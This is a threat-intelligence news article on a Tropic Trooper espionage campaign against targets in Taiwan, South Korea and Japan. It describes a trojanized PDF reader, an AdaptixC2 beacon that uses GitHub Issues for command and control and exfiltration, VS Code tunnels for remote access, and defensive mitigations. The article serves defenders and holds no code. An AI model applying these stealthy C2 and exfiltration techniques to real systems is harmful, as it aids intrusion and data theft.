A new cyberattack campaign attributed to the notorious threat group Tropic Trooper has been uncovered, employing sophisticated techniques including a custom beacon listener and Visual Studio (VS) Code tunnels for remote access. This campaign, which began on March 12, 2026, has been targeting individuals in Taiwan, South Korea, and Japan, using military-themed documents as initial lures. The adaptation of open-source tools and developer infrastructure marks a significant evolution in the group’s modus operandi.
The attack chain commences with a trojanized version of the open-source SumatraPDF reader, disguised as an executable file with a title referencing submarine cooperation between the US, UK, and Australia. Upon execution, the malicious file presents a seemingly innocuous PDF document about the AUKUS security partnership, while surreptitiously downloading and activating the AdaptixC2 Beacon agent in the background. This multi-stage approach effectively conceals the true nature of the intrusion from unsuspecting victims.
Tropic Trooper’s Evolving Tactics: Custom Beacon and VS Code Tunnels
Researchers at Zscaler ThreatLabz have identified and analyzed the full extent of this campaign, citing strong evidence that links it to Tropic Trooper, also known by aliases such as Earth Centaur and Pirate Panda. The group’s utilization of a loader similar to the previously observed TOSHIS loader and the presence of other known Tropic Trooper tools, including a CobaltStrike Beacon with a distinctive watermark, on the staging server further solidify this attribution.
A key development in this campaign is Tropic Trooper’s departure from its earlier reliance on tools like Cobalt Strike Beacon or Merlin Mythic agents. Instead, the group has adopted the open-source AdaptixC2 framework, enhancing it with a custom beacon listener. This strategic shift towards publicly available offensive tools not only makes attribution more challenging but also lowers the operational threshold for reuse across various malicious endeavors, a trend observed among advanced persistent threat (APT) groups in the Asia-Pacific region.
Perhaps the most innovative aspect of this attack is the threat actor’s exploitation of Visual Studio (VS) Code tunnels for establishing remote access to compromised systems deemed “interesting.” Post-initial compromise, observed commands included the creation of scheduled tasks for persistence, network reconnaissance using standard tools like `arp` and `net view`, and direct interactive access to victim machines via VS Code tunnels. This abuse of a widely-trusted developer tool significantly hinders detection efforts, as VS Code traffic often bypasses stringent security and network monitoring protocols.
How the AdaptixC2 Beacon Uses GitHub as Its C2
The technical ingenuity of this campaign shines through in the AdaptixC2 beacon listener’s innovative use of GitHub as its command-and-control (C2) platform. Rather than relying on traditional attacker-controlled servers, the beacon communicates with a GitHub repository, receiving task assignments from GitHub Issues and exfiltrating results as file contents back to the same repository.
This C2 workflow is managed through a repository created under a fake GitHub account, making it exceptionally difficult for network defenders to differentiate malicious traffic from legitimate developer activities. The beacon first ascertains its external IP address using ipinfo.io, as GitHub-based communication does not inherently provide this information. Subsequently, it initiates communication by sending an encrypted beacon via a POST request to GitHub Issue number 1, utilizing an RC4 session key derived from a random seed to establish the connection.
The beacon actively monitors the repository’s open issues for pending tasks. Commands are processed based on patterns in issue titles, such as “upload” or “fileupload.” Encrypted responses are then transmitted back as Base64-encoded file uploads to the repository. For enhanced stealth, all C2 traffic is encrypted with RC4. Moreover, to further obscure their activities, researchers observed that beacons uploaded to GitHub were deleted within 10 seconds of posting, effectively eradicating session keys and rendering decryption by any observer nearly impossible.
To mitigate exposure to such sophisticated attacks, organizations are advised to implement several key security measures. These include blocking or closely monitoring traffic to unusual GitHub API endpoints from non-developer endpoints, particularly requests directed at user-created repositories. Strict application allowlisting policies should be enforced to prevent the execution of trojanized binaries masquerading as legitimate software. Additionally, monitoring for unusual scheduled task creations, especially those impersonating system services, is crucial.
Organizations should also consider restricting or auditing the use of VS Code tunnels within corporate environments, as this feature can facilitate unauthorized remote access. Hunting for the use of services like ipinfo.io from internal systems can serve as an indicator of beaconing behavior. Finally, robust email and file gateway controls are essential for intercepting malicious ZIP archives that disguise executable files as documents.
The ongoing evolution of threat actor tactics, as demonstrated by Tropic Trooper’s creative use of developer tools and platforms, underscores the need for continuous adaptation in cybersecurity defenses. Organizations must remain vigilant and proactive in identifying and mitigating emergent threats, particularly those leveraging the broad trust placed in legitimate software and services.